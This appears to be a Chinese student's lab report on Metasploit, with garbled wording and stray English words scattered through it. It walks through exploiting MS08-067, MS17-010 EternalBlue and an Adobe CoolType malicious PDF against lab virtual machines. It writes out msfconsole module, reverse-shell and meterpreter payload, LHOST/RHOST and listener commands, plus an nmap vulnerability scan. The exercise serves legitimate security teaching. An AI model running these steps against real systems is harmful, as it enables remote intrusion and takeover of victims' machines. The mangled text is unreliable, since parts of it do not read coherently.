1.实践内容(3.5分)linux
本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体我尝试了:web
1.3 一个针对客户端的攻击:Adobe(成功不惟一);shell
1.4 成功应用辅助模块:scanner/http/options(成功,不惟一)。windows
2.一些问题api
encode:对道具进行包装浏览器
免杀技术吧,如今咱们还不能很好地实现真正意义上的免杀;还有就是咱们制做的后门程序都很简单,,通常人看都看出来是不正经软件了。服务器
1.打开kali与Linux Metasploit,测试两虚拟机之间可否ping通:
网络
2.查看以前写好的脚本
tcp
3.在命令行输入msfconsole -r msfcli.rc
运行在以前我已经写好的脚本,攻击成功
学习
1.打开WinXPEnSP3虚拟机。将其网络链接方式改成NAT
模式后重启。测试其与kali可否相互ping通:
2.切换到kali虚拟机界面,输入msfconsole
启动msf。启动后输入search ms08_067
,出现了一条漏洞信息。
3.输入use windows/smb/ms08_067_netapi
:
4.输入show payload
,出现载荷列表,发现有100多个载荷
5.输入set payload generic/shell_reverse_tcp
设置载荷。
6.输入show options
查看参数。发现源IP和目的IP还没设置,输入set PHOST 192.168.10.12
和set LHOST 10.10.10.128
设定参数
7.输入run
开始攻击。攻击失败。(这里好多同窗都成功了哎,,不知道是否是下载途径不同的缘由。)
search ms11_050
,查询跟漏洞相关的信息use exploit/windows/smb/ms17_010_eternalblue
show payloads
,查询有哪些载荷set payload generic/shell_reverse_tcp
设定输入载荷show options
,查看有哪些参数须要设置。发现还空缺的参数是LHOST和RHOST。输入set RHOST 10.10.10.132
,set LHOST 10.10.10.128
设定参数7.输入exploit
开始攻击,执行一段时间后卡在了以下界面:
[攻击方IP地址]/*
,而后才能回连成功。9.在靶机上打开IE浏览器,输入10.10.10.128/5214
10.回到kali,输入ipconfig
指令和pwd
指令进行测验,链接成功:
set payload windows/metsvc_bind_tcp
12.输入参数后链接失败:
13.再换一个payload:windows/x64/shell_bind_tcp
,这回在Win7打开IE后输入10.10.10.128
,回连成功
search adobe
,查询跟漏洞相关的信息use windows/fileformat/adobe_cooltype_sing
show payloads
,查询有哪些载荷set payload windows/meterpreter/reverse_tcp
设定输入载荷show options
,查看有哪些参数须要设置。发现还空缺的参数是LHOST和RHOST。输入set RHOST 10.10.10.132
,set LHOST 10.10.10.128
设定参数6.提示在.msf/local
下生成了pdf。
8.在msf输入use exploit/multi/handler
和set payload windows/meterpreter/reverse_tcp
后进入监听模式,设定LHOSTset LHOST 10.10.10.128
,输入exploit开始监听。这时候切换到Win7打开该pdf,回连成功:
search auxiliary
查找辅助模块,发现有1000多个。scanner/http/options
-1.在攻击靶机为WinXPEnSP3的ms08_067漏洞以前,测试可否ping通,发现不能ping通。
解决方法:这里是由于我根据教材的环境配置把XP设置为了内网,而kali在DMZ区,因此须要启动网关服务器才能够ping通。所以在这里须要启动个人第三台虚拟机Linux Metasploit
2.在实验中,有时候靶机并不存在咱们想要攻击的漏洞,一个一个试又要花费很长的时间。在同窗的帮助下,我发现了能够用nmap来提早检测漏洞是否存在。不过这已是我在作完全部实验步骤以后才知道的了。我拿了一个我攻击失败了的漏洞(靶机为WinXPEnSP3的ms08_067)来进行尝试,在命令行输入nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.10.128
,发现没有该漏洞相关的字段,不过能够看到目标系统。